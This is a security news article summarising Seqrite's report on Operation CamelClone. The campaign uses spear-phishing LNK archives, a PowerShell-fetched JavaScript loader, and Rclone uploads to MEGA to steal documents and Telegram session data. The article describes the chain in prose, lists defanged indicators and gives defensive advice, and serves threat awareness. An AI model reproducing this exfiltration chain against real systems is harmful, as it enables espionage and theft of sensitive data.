CamelClone spy campaign abuses public file-sharing sites and Rclone in government-focused attacks
4 min. read 
Published on
A newly documented espionage campaign called Operation CamelClone is targeting government, defense, diplomatic, and strategic-sector entities across Algeria, Mongolia, Ukraine, and Kuwait. Seqrite says the attackers use spear-phishing ZIP files disguised as official government correspondence, then rely on public file-sharing sites and the legitimate tool Rclone to steal documents and Telegram session data without using a traditional command-and-control server.
What makes the operation stand out is its infrastructure model. Instead of building dedicated attacker-controlled servers, the operators host payloads on the public file-sharing site filebulldogs[.]com and move stolen files to MEGA cloud storage. That approach helps the traffic blend into ordinary internet activity and makes network-based detection harder.
Seqrite says the campaign first surfaced in late February 2026, when a suspicious ZIP file themed around Algeria’s Ministry of Housing appeared on VirusTotal. The researchers later found additional samples using Mongolia, Algeria-Ukraine cooperation, and Kuwait Air Force themed lures, which pointed to a broader intelligence-focused operation rather than an isolated phishing run.
How the CamelClone attack works
Each observed archive contained a malicious Windows shortcut file and a decoy image or document designed to look official. Seqrite says that when the victim opens the shortcut, a hidden PowerShell command runs silently, switches to the Temp directory, downloads a JavaScript file named f.js from filebulldogs[.]com, saves it locally, and executes it to continue the infection chain.
Seqrite tracks that JavaScript loader as HOPPINGANT. The file runs under Windows Script Host and launches two Base64-encoded PowerShell commands. Those commands download a decoy PDF to distract the victim, then fetch another archive named a.zip, which contains a portable copy of Rclone version 1.70.3.
After extracting Rclone, the script rebuilds a password with a simple XOR routine using the key value 56, then uses those credentials to authenticate to a MEGA account registered with an onionmail.org address. Seqrite says the malware then collects .doc, .docx, .pdf, and .txt files from the Desktop and also tries to exfiltrate Telegram Desktop session data from the tdata directory.
Why researchers see this as espionage, not routine cybercrime
Seqrite says the targeting pattern points toward intelligence collection. The victims and lure themes focused on government bodies, defense procurement, foreign affairs, diplomatic cooperation, and strategic energy-linked environments. The company says that choice of targets, plus the geopolitical themes in the decoy files, aligns more closely with spying goals than with financially motivated cybercrime.
The campaign also shows discipline in how it separates its operations. Seqrite observed the same file-sharing domain across all four campaigns, but with different upload paths such as /uploads/AVQB61TVOX/, /uploads/OKW5RN48ZJ/, and /uploads/F1OQY9GU84/. The researchers believe that separation helps the attackers run multiple parallel campaigns while reducing the chance that one takedown removes every payload at once.
Key details at a glance
| Item | Detail |
|---|---|
| Campaign name | Operation CamelClone |
| Main targets | Government, defense, diplomatic, and strategic sectors |
| Countries named by Seqrite | Algeria, Mongolia, Ukraine, Kuwait |
| Initial delivery | Spear-phishing ZIP archive with malicious LNK |
| Loader | HOPPINGANT JavaScript |
| Payload abuse | Rclone v1.70.3 used for exfiltration |
| Payload hosting | filebulldogs[.]com |
| Exfiltration destination | MEGA accounts tied to onionmail.org emails |
What makes CamelClone harder to detect
The campaign avoids the classic model of malware talking to a visible C2 server. Instead, it abuses public services that defenders often allow or treat as low-priority traffic. Seqrite says this model makes pure network detection less effective because the activity looks closer to standard web downloads and cloud storage use.
The attackers also reused key technical patterns across the campaigns. Seqrite says the same XOR key, the same HOPPINGANT loader family, and the same Rclone settings appeared in the different samples. Those overlaps strongly suggest a coordinated operation rather than unrelated attacks borrowing similar lures.
What organizations should do
- Treat unsolicited ZIP files that reference ministries, defense deals, or diplomatic cooperation as high risk.
- Restrict or monitor LNK execution from untrusted sources.
- Watch for PowerShell launching JavaScript or downloading files into Temp paths.
- Monitor outbound traffic to anonymous file-sharing sites and cloud storage services such as MEGA.
- Hunt for suspicious use of Rclone on systems where it should not normally appear. This last point follows from Seqrite’s documented use of Rclone in the campaign.
FAQ
It is a multi-region espionage campaign that Seqrite says targeted government, defense, diplomatic, and strategic-sector entities using spear-phishing archives and a file-sharing based infection chain.
Seqrite says the attackers host payloads on filebulldogs[.]com and upload stolen data to MEGA, rather than relying on dedicated attacker servers.
Because the attackers use the legitimate Rclone tool to transfer stolen files to MEGA, which helps the exfiltration blend in with normal cloud activity.
Seqrite says the campaign targets documents on the Desktop, including Word files, PDFs, text files, and Telegram Desktop session data.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
Improve this guide
User forum
0 messages